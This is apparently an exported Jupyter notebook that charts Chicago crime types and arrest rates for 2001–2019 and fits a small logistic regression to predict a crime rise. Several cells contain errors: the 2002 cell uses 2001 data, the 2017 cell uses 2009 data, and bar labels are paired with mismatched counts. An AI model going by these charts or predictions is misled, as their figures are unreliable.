plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2008-2011 Max: {}={}".format(c0811u[:8][0],c0811val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c0811u[:8],c0811val[:8],color=color,width=0.5) # In[21]: c1217arr=np.array(c1217smooth['Primary Type']) c1217u=np.unique(c1217arr) c1217key=np.unique(np.array(np.array(c1217smooth['Primary Type']))) c1217val=np.array(c1217smooth['Primary Type'].value_counts().values) print(c1217u[:8]) print(c1217val[:8]) color='cmykrgb' plt.figure(figsize=(30,9)) plt.title("Crime Scenario of 2012-2017 Max: {}={}".format(c1217u[:8][0],c1217val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c1217u[:8],c1217val[:8],color=color,width=0.5) # In[47]: for i in range(len(c0104val[:8])): val=[c0104val[:8][i],c0507val[:8][i],c0811val[:8][i],c1217val[:8][i]] year=['2001-2004','2005-2007','2008-2011','2012-2017'] color='cmykrgb' plt.figure(figsize=(18,7)) plt.title("Crime Scenario of {}".format(c1217u[:8][i]),fontsize=20,color='m') plt.xlabel("Crime Year->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(year,val,color=color,width=0.5) plt.savefig("C:/Users/maiti/OneDrive/Desktop/crimes-in-chicago/viz/"+c1217u[:8][i]) # ### 2001 # In[24]: c01=c0104smooth[c0104smooth['Year']==2001] c01=c01[c01.columns.tolist()[1:]] c01.head() c01arr=np.array(c01['Primary Type']) c01u=np.unique(c01arr) c01key=np.unique(np.array(np.array(c01['Primary Type']))) c01val=np.array(c01['Primary Type'].value_counts().values) print(c01u[:8]) print(c01val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2001 Max: {}={}".format(c01u[:8][0],c01val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c01u[:8],c01val[:8],color=color,width=0.5) # ### 2002 # In[25]: c02=c0104smooth[c0104smooth['Year']==2002] c02=c02[c02.columns.tolist()[1:]] c02.head() c02arr=np.array(c01['Primary Type']) c02u=np.unique(c02arr) c02key=np.unique(np.array(np.array(c02['Primary Type']))) c02val=np.array(c02['Primary Type'].value_counts().values) print(c02u[:8]) print(c02val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2002 Max: {}={}".format(c02u[:8][0],c02val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c02u[:8],c02val[:8],color=color,width=0.5) # ### 2003 # In[26]: c03=c0104smooth[c0104smooth['Year']==2003] c03=c03[c03.columns.tolist()[1:]] c03.head() c03arr=np.array(c03['Primary Type']) c03u=np.unique(c03arr) c03key=np.unique(np.array(np.array(c03['Primary Type']))) c03val=np.array(c03['Primary Type'].value_counts().values) print(c03u[:8]) print(c03val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2003 Max: {}={}".format(c03u[:8][0],c03val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c03u[:8],c03val[:8],color=color,width=0.5) # ### 2004 # In[27]: c04=c0104smooth[c0104smooth['Year']==2004] c04=c04[c04.columns.tolist()[1:]] c04.head() c04arr=np.array(c04['Primary Type']) c04u=np.unique(c04arr) c04key=np.unique(np.array(np.array(c04['Primary Type']))) c04val=np.array(c04['Primary Type'].value_counts().values) print(c04u[:8]) print(c04val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2004 Max: {}={}".format(c04u[:8][0],c04val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c04u[:8],c04val[:8],color=color,width=0.5) # ### 2005 # In[28]: c05=c0507smooth[c0507smooth['Year']==2005] c05=c05[c05.columns.tolist()[1:]] c05.head() c05arr=np.array(c05['Primary Type']) c05u=np.unique(c05arr) c05key=np.unique(np.array(np.array(c05['Primary Type']))) c05val=np.array(c05['Primary Type'].value_counts().values) print(c05u[:8]) print(c05val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2005 Max: {}={}".format(c05u[:8][0],c05val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c05u[:8],c05val[:8],color=color,width=0.5) # ### 2006 # In[29]: c06=c0507smooth[c0507smooth['Year']==2006] c06=c06[c06.columns.tolist()[1:]] c06.head() c06arr=np.array(c06['Primary Type']) c06u=np.unique(c06arr) c06key=np.unique(np.array(np.array(c06['Primary Type']))) c06val=np.array(c06['Primary Type'].value_counts().values) print(c06u[:8]) print(c06val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2006 Max: {}={}".format(c06u[:8][0],c06val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c06u[:8],c06val[:8],color=color,width=0.5) # ### 2007 # In[30]: c07=c0507smooth[c0507smooth['Year']==2007] c07=c07[c07.columns.tolist()[1:]] c07.head() c07arr=np.array(c07['Primary Type']) c07u=np.unique(c07arr) c07key=np.unique(np.array(np.array(c07['Primary Type']))) c07val=np.array(c07['Primary Type'].value_counts().values) print(c07u[:8]) print(c07val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2007 Max: {}={}".format(c07u[:8][0],c07val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c07u[:8],c07val[:8],color=color,width=0.5) # ### 2008 # In[106]: c08=c0811smooth[c0811smooth['Year']==2008] c08=c08[c08.columns.tolist()[1:]] c08.head() c08arr=np.array(c08['Primary Type']) c08u=np.unique(c08arr) c08key=np.unique(np.array(np.array(c08['Primary Type']))) c08val=np.array(c08['Primary Type'].value_counts().values) print(c08u[:8]) print(c08val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2008 Max: {}={}".format(c08u[:8][0],c08val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c08u[:8],c08val[:8],color=color,width=0.5) c08.head() # ### 2009 # In[32]: c09=c0811smooth[c0811smooth['Year']==2009] c09=c09[c09.columns.tolist()[1:]] c09.head() c09arr=np.array(c09['Primary Type']) c09u=np.unique(c09arr) c09key=np.unique(np.array(np.array(c09['Primary Type']))) c09val=np.array(c09['Primary Type'].value_counts().values) print(c09u[:8]) print(c09val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2009 Max: {}={}".format(c09u[:8][0],c09val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c09u[:8],c09val[:8],color=color,width=0.5) # ### 2010 # In[33]: c10=c0811smooth[c0811smooth['Year']==2010] c10=c10[c10.columns.tolist()[1:]] c10.head() c10arr=np.array(c10['Primary Type']) c10u=np.unique(c10arr) c10key=np.unique(np.array(np.array(c10['Primary Type']))) c10val=np.array(c10['Primary Type'].value_counts().values) print(c10u[:8]) print(c10val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2010 Max: {}={}".format(c10u[:8][0],c10val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c10u[:8],c10val[:8],color=color,width=0.5) # ### 2011 # In[34]: c11=c0811smooth[c0811smooth['Year']==2011] c11=c11[c11.columns.tolist()[1:]] c11.head() c11arr=np.array(c11['Primary Type']) c11u=np.unique(c11arr) c11key=np.unique(np.array(np.array(c11['Primary Type']))) c11val=np.array(c11['Primary Type'].value_counts().values) print(c11u[:8]) print(c11val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2011 Max: {}={}".format(c11u[:8][0],c11val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c11u[:8],c11val[:8],color=color,width=0.5) # ### 2012 # In[35]: c12=c1217smooth[c1217smooth['Year']==2012] c12=c12[c12.columns.tolist()[1:]] c12.head() c12arr=np.array(c12['Primary Type']) c12u=np.unique(c12arr) c12key=np.unique(np.array(np.array(c12['Primary Type']))) c12val=np.array(c12['Primary Type'].value_counts().values) print(c12u[:8]) print(c12val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2012 Max: {}={}".format(c12u[:8][0],c12val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c12u[:8],c12val[:8],color=color,width=0.5) # ### 2013 # In[36]: c13=c1217smooth[c1217smooth['Year']==2013] c13=c13[c13.columns.tolist()[1:]] c13.head() c13arr=np.array(c13['Primary Type']) c13u=np.unique(c13arr) c13key=np.unique(np.array(np.array(c13['Primary Type']))) c13val=np.array(c13['Primary Type'].value_counts().values) print(c13u[:8]) print(c13val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2013 Max: {}={}".format(c13u[:8][0],c13val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c13u[:8],c13val[:8],color=color,width=0.5) # ### 2014 # In[37]: c14=c1217smooth[c1217smooth['Year']==2014] c14=c14[c14.columns.tolist()[1:]] c14.head() c14arr=np.array(c14['Primary Type']) c14u=np.unique(c14arr) c14key=np.unique(np.array(np.array(c14['Primary Type']))) c14val=np.array(c14['Primary Type'].value_counts().values) print(c14u[:8]) print(c14val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2014 Max: {}={}".format(c14u[:8][0],c14val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c14u[:8],c14val[:8],color=color,width=0.5) # ### 2015 # In[38]: c15=c1217smooth[c1217smooth['Year']==2015] c15=c15[c15.columns.tolist()[1:]] c15.head() c15arr=np.array(c15['Primary Type']) c15u=np.unique(c15arr) c15key=np.unique(np.array(np.array(c15['Primary Type']))) c15val=np.array(c15['Primary Type'].value_counts().values) print(c15u[:8]) print(c15val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2015 Max: {}={}".format(c15u[:8][0],c15val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=15,color='b') plt.ylabel("Crime Occured->",fontsize=15,color='b') plt.grid() plt.bar(c15u[:8],c15val[:8],color=color,width=0.5) # ### 2016 # In[39]: c16=c1217smooth[c1217smooth['Year']==2016] c16=c16[c16.columns.tolist()[1:]] c16.head() c16arr=np.array(c16['Primary Type']) c16u=np.unique(c16arr) c16key=np.unique(np.array(np.array(c16['Primary Type']))) c16val=np.array(c16['Primary Type'].value_counts().values) print(c16u[:8]) print(c16val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2016 Max: {}={}".format(c16u[:8][0],c16val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=16,color='b') plt.ylabel("Crime Occured->",fontsize=16,color='b') plt.grid() plt.bar(c16u[:8],c16val[:8],color=color,width=0.5) # ### 2017 # In[40]: c17=c0811smooth[c0811smooth['Year']==2009] c17=c17[c17.columns.tolist()[1:]] c17.head() c17arr=np.array(c17['Primary Type']) c17u=np.unique(c17arr) c17key=np.unique(np.array(np.array(c17['Primary Type']))) c17val=np.array(c17['Primary Type'].value_counts().values) print(c17u[:8]) print(c17val[:8]) color='cmykrgb' plt.figure(figsize=(20,7)) plt.title("Crime Scenario of 2017 Max: {}={}".format(c17u[:8][0],c17val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=17,color='b') plt.ylabel("Crime Occured->",fontsize=17,color='b') plt.grid() plt.bar(c17u[:8],c17val[:8],color=color,width=0.5) plt.figure(figsize=(18,10)) plt.title("Crime Scenario of 2017",fontsize=20,color='m') plt.ylabel("Crime Type->",fontsize=17,color='b') plt.xlabel("Crime Occured->",fontsize=17,color='b') plt.grid() plt.barh(c17u,c17val) #c17.groupby('Primary Type')['Arrest'].count() # ### 2018 # In[41]: c18=c1719[c1719['Year']==2018] c18=c18[c18.columns.tolist()[1:]] c18.head() c18arr=np.array(c18['Primary Type']) c18u=np.unique(c18arr) c18key=np.unique(np.array(np.array(c18['Primary Type']))) c18val=np.array(c18['Primary Type'].value_counts().values) print(c18u[:8]) print(c18val[:8]) color='cmykrgb' plt.figure(figsize=(28,7)) plt.title("Crime Scenario of 2018 Max: {}={}".format(c18u[:8][0],c18val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=18,color='b') plt.ylabel("Crime Occured->",fontsize=18,color='b') plt.grid() plt.bar(c18u[:8],c18val[:8],color=color,width=0.5) plt.figure(figsize=(18,10)) plt.title("Crime Scenario of 2018",fontsize=20,color='m') plt.ylabel("Crime Type->",fontsize=17,color='b') plt.xlabel("Crime Occured->",fontsize=17,color='b') plt.grid() plt.barh(c18u,c18val) c18.head() # ### 2019 # In[42]: c19=c1719[c1719['Year']==2019] c19=c19[c19.columns.tolist()[1:]] c19.head() c19arr=np.array(c19['Primary Type']) c19u=np.unique(c19arr) c19key=np.unique(np.array(np.array(c19['Primary Type']))) c19val=np.array(c19['Primary Type'].value_counts().values) print(c19u[:8]) print(c19val[:8]) color='cmykrgb' plt.figure(figsize=(28,7)) plt.title("Crime Scenario of 2019 Max: {}={}".format(c19u[:8][0],c19val[:8][0]),fontsize=20,color='m') plt.xlabel("Crime Type->",fontsize=19,color='b') plt.ylabel("Crime Occured->",fontsize=19,color='b') plt.grid() plt.bar(c19u[:8],c19val[:8],color=color,width=0.5) plt.figure(figsize=(18,10)) plt.title("Crime Scenario of 2019",fontsize=20,color='m') plt.ylabel("Crime Type->",fontsize=17,color='b') plt.xlabel("Crime Occured->",fontsize=17,color='b') plt.grid() plt.barh(c19u,c19val) # In[43]: crmyr=['2019','2018','2017','2016','2015','2014','2013','2012'] crm=[c19val[:8][0],c18val[:8][0],c17val[:8][0],c16val[:8][0],c15val[:8][0],c14val[:8][0],c13val[:8][0],c12val[:8][0]] # In[48]: for i in range(len(c19u[:8])): plt.figure(figsize=(10,5)) crmyr=['2019','2018','2017','2016','2015','2014','2013','2012'] crm=[c19val[:8][i],c18val[:8][i],c17val[:8][i],c16val[:8][i],c15val[:8][i],c14val[:8][i],c13val[:8][i],c12val[:8][i]] plt.title("{} Crime Rate".format(c19u[:8][i]),fontsize=20,color="m") plt.xlabel("Year->",fontsize=13,color="b") plt.ylabel("Count of Crime",fontsize=13,color="b") plt.grid() plt.plot(crmyr[::-1],crm[::-1],"g") plt.plot(crmyr[::-1],crm[::-1],"Dr") plt.savefig("Directory Location"+c19u[:8][i]+"_graph") # ## Comparative analysis of 19 years # #### Arrest # In[52]: c0104arst=np.array(c0104['Arrest']) c0104arstu=np.unique(c0104arst) print(c0104arstu) c0104arst=c0104arst.tolist() #print(c19arst) cntt0104=c0104arst.count(c0104arstu[0]) cntf0104=c0104arst.count(c0104arstu[1]) cnt0104=[cntt0104,cntf0104] print(cnt0104) # In[78]: arrst=[] arrstratf=[] arrstratt=[] # #### Arrest in 2001 # In[79]: c01arrststs=c01.groupby(['Arrest']).count()['Case Number'].keys().tolist() c01arrstcnt=c01.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c01arrststs) print(c01arrstcnt) # In[80]: arrst.append(c01arrstcnt[0]) arrstratf.append((c01arrstcnt[0]/sum(c01arrstcnt))*100) arrstratt.append((c01arrstcnt[1]/sum(c01arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2002 # In[82]: c02arrststs=c02.groupby(['Arrest']).count()['Case Number'].keys().tolist() c02arrstcnt=c02.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c02arrststs) print(c02arrstcnt) # In[83]: arrst.append(c02arrstcnt[0]) arrstratf.append((c02arrstcnt[0]/sum(c02arrstcnt))*100) arrstratt.append((c02arrstcnt[1]/sum(c02arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2003 # In[84]: c03arrststs=c03.groupby(['Arrest']).count()['Case Number'].keys().tolist() c03arrstcnt=c03.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c03arrststs) print(c03arrstcnt) # In[85]: arrst.append(c03arrstcnt[0]) arrstratf.append((c03arrstcnt[0]/sum(c03arrstcnt))*100) arrstratt.append((c03arrstcnt[1]/sum(c03arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2004 # In[88]: c04arrststs=c04.groupby(['Arrest']).count()['Case Number'].keys().tolist() c04arrstcnt=c04.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c04arrststs) print(c04arrstcnt) # In[89]: arrst.append(c04arrstcnt[0]) arrstratf.append((c04arrstcnt[0]/sum(c04arrstcnt))*100) arrstratt.append((c04arrstcnt[1]/sum(c04arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2005 # In[90]: c05arrststs=c05.groupby(['Arrest']).count()['Case Number'].keys().tolist() c05arrstcnt=c05.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c05arrststs) print(c05arrstcnt) # In[91]: arrst.append(c05arrstcnt[0]) arrstratf.append((c05arrstcnt[0]/sum(c05arrstcnt))*100) arrstratt.append((c05arrstcnt[1]/sum(c05arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2006 # In[92]: c06arrststs=c06.groupby(['Arrest']).count()['Case Number'].keys().tolist() c06arrstcnt=c06.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c06arrststs) print(c06arrstcnt) # In[93]: arrst.append(c06arrstcnt[0]) arrstratf.append((c06arrstcnt[0]/sum(c06arrstcnt))*100) arrstratt.append((c06arrstcnt[1]/sum(c06arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2007 # In[94]: c07arrststs=c07.groupby(['Arrest']).count()['Case Number'].keys().tolist() c07arrstcnt=c07.groupby(['Arrest']).count()['Case Number'].values.tolist() print(c07arrststs) print(c07arrstcnt) # In[95]: arrst.append(c07arrstcnt[0]) arrstratf.append((c07arrstcnt[0]/sum(c07arrstcnt))*100) arrstratt.append((c07arrstcnt[1]/sum(c07arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2008 # In[103]: c08.columns.tolist() # In[109]: c08arrststs=c0811[c0811['Year']==2008].groupby(['Arrest']).count()['Case Number'].keys().tolist() c08arrstcnt=c0811[c0811['Year']==2008].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c08arrststs) print(c08arrstcnt) # In[110]: arrst.append(c08arrstcnt[0]) arrstratf.append((c08arrstcnt[0]/sum(c08arrstcnt))*100) arrstratt.append((c08arrstcnt[1]/sum(c08arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2009 # In[111]: c09arrststs=c0811[c0811['Year']==2009].groupby(['Arrest']).count()['Case Number'].keys().tolist() c09arrstcnt=c0811[c0811['Year']==2009].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c09arrststs) print(c09arrstcnt) # In[112]: arrst.append(c09arrstcnt[0]) arrstratf.append((c09arrstcnt[0]/sum(c09arrstcnt))*100) arrstratt.append((c09arrstcnt[1]/sum(c09arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2010 # In[113]: c10arrststs=c0811[c0811['Year']==2010].groupby(['Arrest']).count()['Case Number'].keys().tolist() c10arrstcnt=c0811[c0811['Year']==2010].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c10arrststs) print(c10arrstcnt) # In[114]: arrst.append(c10arrstcnt[0]) arrstratf.append((c10arrstcnt[0]/sum(c10arrstcnt))*100) arrstratt.append((c10arrstcnt[1]/sum(c10arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2011 # In[115]: c11arrststs=c0811[c0811['Year']==2011].groupby(['Arrest']).count()['Case Number'].keys().tolist() c11arrstcnt=c0811[c0811['Year']==2011].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c11arrststs) print(c11arrstcnt) # In[116]: arrst.append(c11arrstcnt[0]) arrstratf.append((c11arrstcnt[0]/sum(c11arrstcnt))*100) arrstratt.append((c11arrstcnt[1]/sum(c11arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2012 # In[117]: c12arrststs=c1217[c1217['Year']==2012].groupby(['Arrest']).count()['Case Number'].keys().tolist() c12arrstcnt=c1217[c1217['Year']==2012].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c12arrststs) print(c12arrstcnt) # In[118]: arrst.append(c12arrstcnt[0]) arrstratf.append((c12arrstcnt[0]/sum(c12arrstcnt))*100) arrstratt.append((c12arrstcnt[1]/sum(c12arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2013 # In[119]: c13arrststs=c1217[c1217['Year']==2013].groupby(['Arrest']).count()['Case Number'].keys().tolist() c13arrstcnt=c1217[c1217['Year']==2013].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c13arrststs) print(c13arrstcnt) # In[120]: arrst.append(c13arrstcnt[0]) arrstratf.append((c13arrstcnt[0]/sum(c13arrstcnt))*100) arrstratt.append((c13arrstcnt[1]/sum(c13arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2014 # In[121]: c14arrststs=c1217[c1217['Year']==2014].groupby(['Arrest']).count()['Case Number'].keys().tolist() c14arrstcnt=c1217[c1217['Year']==2014].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c14arrststs) print(c14arrstcnt) # In[122]: arrst.append(c14arrstcnt[0]) arrstratf.append((c14arrstcnt[0]/sum(c14arrstcnt))*100) arrstratt.append((c14arrstcnt[1]/sum(c14arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2015 # In[123]: c15arrststs=c1217[c1217['Year']==2015].groupby(['Arrest']).count()['Case Number'].keys().tolist() c15arrstcnt=c1217[c1217['Year']==2015].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c15arrststs) print(c15arrstcnt) # In[124]: arrst.append(c15arrstcnt[0]) arrstratf.append((c15arrstcnt[0]/sum(c15arrstcnt))*100) arrstratt.append((c15arrstcnt[1]/sum(c15arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2016 # In[125]: c16arrststs=c1217[c1217['Year']==2016].groupby(['Arrest']).count()['Case Number'].keys().tolist() c16arrstcnt=c1217[c1217['Year']==2016].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c16arrststs) print(c16arrstcnt) # In[126]: arrst.append(c16arrstcnt[0]) arrstratf.append((c16arrstcnt[0]/sum(c16arrstcnt))*100) arrstratt.append((c16arrstcnt[1]/sum(c16arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2017 # In[129]: c17arrststs=c1719[c1719['Year']==2017].groupby(['Arrest']).count()['Case Number'].keys().tolist() c17arrstcnt=c1719[c1719['Year']==2017].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c17arrststs) print(c17arrstcnt) # In[130]: arrst.append(c17arrstcnt[0]) arrstratf.append((c17arrstcnt[0]/sum(c17arrstcnt))*100) arrstratt.append((c17arrstcnt[1]/sum(c17arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2018 # In[131]: c18arrststs=c1719[c1719['Year']==2018].groupby(['Arrest']).count()['Case Number'].keys().tolist() c18arrstcnt=c1719[c1719['Year']==2018].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c18arrststs) print(c18arrstcnt) # In[132]: arrst.append(c18arrstcnt[0]) arrstratf.append((c18arrstcnt[0]/sum(c18arrstcnt))*100) arrstratt.append((c18arrstcnt[1]/sum(c18arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # #### Arrest in 2019 # In[133]: c19arrststs=c1719[c1719['Year']==2019].groupby(['Arrest']).count()['Case Number'].keys().tolist() c19arrstcnt=c1719[c1719['Year']==2019].groupby(['Arrest']).count()['Case Number'].values.tolist() print(c19arrststs) print(c19arrstcnt) # In[134]: arrst.append(c19arrstcnt[0]) arrstratf.append((c19arrstcnt[0]/sum(c19arrstcnt))*100) arrstratt.append((c19arrstcnt[1]/sum(c19arrstcnt))*100) print(arrst) print(arrstratf) print(arrstratt) # In[135]: print(len(arrst)) print(len(arrstratf)) print(len(arrstratt)) # In[141]: yearlist=[str(i) for i in range(2001,2020)] print(yearlist) # In[157]: plt.figure(figsize=(15,6)) plt.title("Crime Arrest Report",fontsize=20,color='m') plt.xlabel("Year->",fontsize=15,color='b') plt.ylabel("Arrest percentage->",fontsize=15,color='b') plt.plot(arrstratt,"k",label="Arrested") plt.plot(arrstratt,"Pk") plt.plot(arrstratf,"r",label="Not Arrested") plt.plot(arrstratf,"Dr") plt.legend(loc="upper right") # In[158]: plt.figure(figsize=(15,6)) plt.title("Crime Arrest Report Yearwise",fontsize=20,color='m') plt.xlabel("Year->",fontsize=15,color='b') plt.ylabel("Arrest percentage->",fontsize=15,color='b') plt.bar(yearlist,arrst,color="crmgybk") # In[165]: arrsted=[c01arrstcnt[1],c02arrstcnt[1],c03arrstcnt[1],c04arrstcnt[1],c05arrstcnt[1],c06arrstcnt[1],c07arrstcnt[1],c08arrstcnt[1],c09arrstcnt[1],c10arrstcnt[1],c11arrstcnt[1],c12arrstcnt[1],c13arrstcnt[1],c14arrstcnt[1],c15arrstcnt[1],c16arrstcnt[1],c17arrstcnt[1],c18arrstcnt[1],c19arrstcnt[1]] print(len(arrsted)) # In[173]: prob=[] pres=arrstratt[0] for i in range(len(arrstratt)): if pres>=arrstratt[i]: prob.append(0) else: prob.append(1) pres=arrstratt[i] print(prob) # In[193]: ratio=[] for i in range(len(arrstratt)): ratio.append(arrsted[i]/(arrst[i]+arrsted[i])) print(ratio) # In[194]: regdata=pd.DataFrame({ "Year":yearlist, "Case Booked":np.array(arrst)+np.array(arrsted), "Not Arrested":arrst, "Arrested":arrsted, "Arrested(%)":arrstratt, "Not Arrested(%)":arrstratf, "Efficiency Ratio":ratio, "Crime Hike":prob }) regdata.to_csv("C:/Users/maiti/OneDrive/Desktop/crimes-in-chicago/regdata.csv") # In[188]: from sklearn.datasets import load_iris from sklearn.linear_model import LogisticRegression logmodel = LogisticRegression() logmodel.fit(regdata[regdata.columns.tolist()[1:len(regdata.columns.tolist())-1]],regdata[regdata.columns.tolist()[-1]]) # In[189]: regdata.columns.tolist() # In[197]: bookcase=int(input("Enter Probable Book Case number: ")) meanrat=np.mean(np.array(regdata['Efficiency Ratio'])) predict_crime=logmodel.predict([[bookcase,bookcase-bookcase*meanrat,bookcase*meanrat,bookcase*meanrat/bookcase,bookcase-(bookcase*meanrat/bookcase),meanrat]]) print(predict_crime[0]) # In[198]: if predict_crime[0]==0: print("Crime in Chicago will be Decreased...") else: print("Crime in Chicago will be Increased...") # In[195]: regdata.head() # In[168]: regdata.corr() # In[124]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2019") sns.countplot(c19['Arrest']) # In[125]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2018") sns.countplot(c18['Arrest']) # In[126]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2017") sns.countplot(c17['Arrest']) # In[127]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2016") sns.countplot(c16['Arrest']) # In[128]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2015") sns.countplot(c15['Arrest']) # In[129]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2014") sns.countplot(c14['Arrest']) # In[130]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2013") sns.countplot(c13['Arrest']) # In[131]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2012") sns.countplot(c12['Arrest']) # In[132]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2011") sns.countplot(c11['Arrest']) # In[133]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2010") sns.countplot(c10['Arrest']) # In[134]: plt.figure(figsize=(8,6)) plt.title("Arrest in 2009") sns.countplot(c09['Arrest']) # ## Primary Type with Arrest # In[135]: np.array(c19.groupby('Primary Type')['Arrest'].count()) # In[136]: np.array(c18.groupby('Primary Type')['Arrest'].count()) # In[137]: np.array(c17.groupby('Primary Type')['Arrest'].count()) # In[138]: np.array(c16.groupby('Primary Type')['Arrest'].count()) # In[139]: np.array(c15.groupby('Primary Type')['Arrest'].count()) # In[140]: np.array(c14.groupby('Primary Type')['Arrest'].count()) # 